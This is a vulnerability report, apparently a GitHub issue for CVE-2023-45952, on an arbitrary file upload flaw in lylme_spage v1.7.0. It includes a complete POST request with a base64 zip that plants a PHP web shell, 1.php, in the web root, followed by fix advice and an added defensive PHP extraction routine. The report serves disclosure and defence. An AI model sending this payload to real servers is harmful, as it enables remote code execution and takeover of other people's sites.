CVE-2023-45952: [vulnerability] Upload Shell Vulnerability in ajax_link.php · Issue #33 · LyLme/lylme_spage
An arbitrary file upload vulnerability in the component ajax_link.php of lylme_spage v1.7.0 allows attackers to execute arbitrary code via uploading a crafted file.
Upload Shell Vulnerability in ajax_link.php

1. Steps to reproduce
1. Send a POST request to http://host/admin/ajax_link.php?submit=update carrying the following data; the injection point is the file field in the HTTP body.
Although this is a backend vulnerability, a pre-auth chain to upload a shell can be built in conjunction with #32.
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1
Host: host
Connection: close
Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ;
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2. After the request is submitted, the shell 1.php is extracted to the ROOT dir.

2. Expected behaviour
The code snippet shown is meant to update the system from a zip package.

3. Actual behaviour
However, a deeper audit of the code found that $RemoteFile can carry arbitrary malicious data, which is then extracted directly into the ROOT dir via the zipExtract function.

4. Affected Version
This vulnerability affects the latest version: lylme_spage v1.7.0

5. Fix recommendations
To fix this vulnerability, here is my advice:
1. Delete this function point
2. Limit decompression file suffixes
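As an added, defender-side example that is not part of this report or of lylme_spage's own code, the following PHP sketch shows how an update-from-zip routine can be hardened along the lines of recommendation 2: the archive is accepted only from a multipart upload (so a POST string carrying a data:// wrapper, as in the request above, never reaches the extractor), and every archive entry's path and suffix are validated before a single file is written under the web root. The function names (safeZipExtract, handleUpdate), the suffix whitelist and the web-root parameter are assumptions, not identifiers from the project.

```php
<?php
// Added example, not lylme_spage code. Names and the whitelist are assumptions.
declare(strict_types=1);

const ALLOWED_SUFFIXES = ['css', 'js', 'png', 'jpg', 'jpeg', 'gif', 'svg', 'html', 'txt', 'json'];

/** Validates every entry first; returns the extracted names or throws before anything is written. */
function safeZipExtract(string $zipPath, string $destDir, array $allowed = ALLOWED_SUFFIXES): array
{
    // Refuse anything that looks like a PHP stream wrapper (data://, php://, http://, ...)
    // even if a caller hands us a string instead of an upload.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $zipPath)) {
        throw new InvalidArgumentException('stream wrappers are not accepted as archive paths');
    }
    $zipReal  = realpath($zipPath);
    $destReal = realpath($destDir);
    if ($zipReal === false || !is_file($zipReal) || $destReal === false || !is_dir($destReal)) {
        throw new InvalidArgumentException('archive or destination does not exist');
    }

    $zip = new ZipArchive();
    if ($zip->open($zipReal) !== true) {
        throw new RuntimeException('cannot open archive');
    }

    $entries = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === false || $name === '' || substr($name, -1) === '/') {
            continue;                                   // directory entry, nothing to write
        }
        $parts = explode('/', str_replace('\\', '/', $name));
        // No absolute paths, NUL bytes or ".." components: everything stays under $destReal.
        if ($name[0] === '/' || strpos($name, "\0") !== false || in_array('..', $parts, true)) {
            $zip->close();
            throw new RuntimeException("unsafe entry path: $name");
        }
        // Suffix whitelist on the last extension, plus a check that no inner component is a
        // PHP suffix, so 1.php.jpg is rejected as well as 1.php (double-extension handlers).
        $dots = explode('.', strtolower(end($parts)));
        array_shift($dots);                             // drop the bare file name
        $ext = array_pop($dots);
        if ($ext === null || !in_array($ext, $allowed, true)) {
            $zip->close();
            throw new RuntimeException("disallowed file type in archive: $name");
        }
        foreach ($dots as $inner) {
            if (preg_match('/^ph(p\d?|tml|ar|ps)$/', $inner)) {
                $zip->close();
                throw new RuntimeException("disallowed inner suffix in archive: $name");
            }
        }
        $entries[] = $name;
    }

    // Every entry passed: extract exactly those names and nothing else in the archive.
    if ($entries !== [] && !$zip->extractTo($destReal, $entries)) {
        $zip->close();
        throw new RuntimeException('extraction failed');
    }
    $zip->close();
    return $entries;
}

/** Handler sketch: the archive comes from a multipart upload, never from a POST string. */
function handleUpdate(string $webRoot): array
{
    if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('no archive uploaded');
    }
    $tmp = $_FILES['file']['tmp_name'];
    // is_uploaded_file() guarantees the path was produced by this request's upload.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('invalid upload');
    }
    return safeZipExtract($tmp, $webRoot);
}

// Constructed CLI demo: an archive whose only entry is 1.php is refused before extraction.
if (PHP_SAPI === 'cli') {
    $tmpZip = sys_get_temp_dir() . '/upd_' . bin2hex(random_bytes(4)) . '.zip';
    $z = new ZipArchive();
    $z->open($tmpZip, ZipArchive::CREATE | ZipArchive::OVERWRITE);
    $z->addFromString('1.php', '<?php // placeholder content for the demo');
    $z->close();
    try {
        safeZipExtract($tmpZip, sys_get_temp_dir());
        echo "unexpected: archive accepted\n";
    } catch (RuntimeException $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
    unlink($tmpZip);
}
```

The two checks do different jobs: taking the archive only from `$_FILES` closes the path the report demonstrates (a user-controlled string fed to a file function, where PHP's wrapper support turns `data://` into archive bytes), while the per-entry validation enforces recommendation 2 so that even a legitimately uploaded package cannot drop executable files or escape the destination directory. Validating all entries before calling extractTo() avoids a half-written web root when a bad archive is rejected.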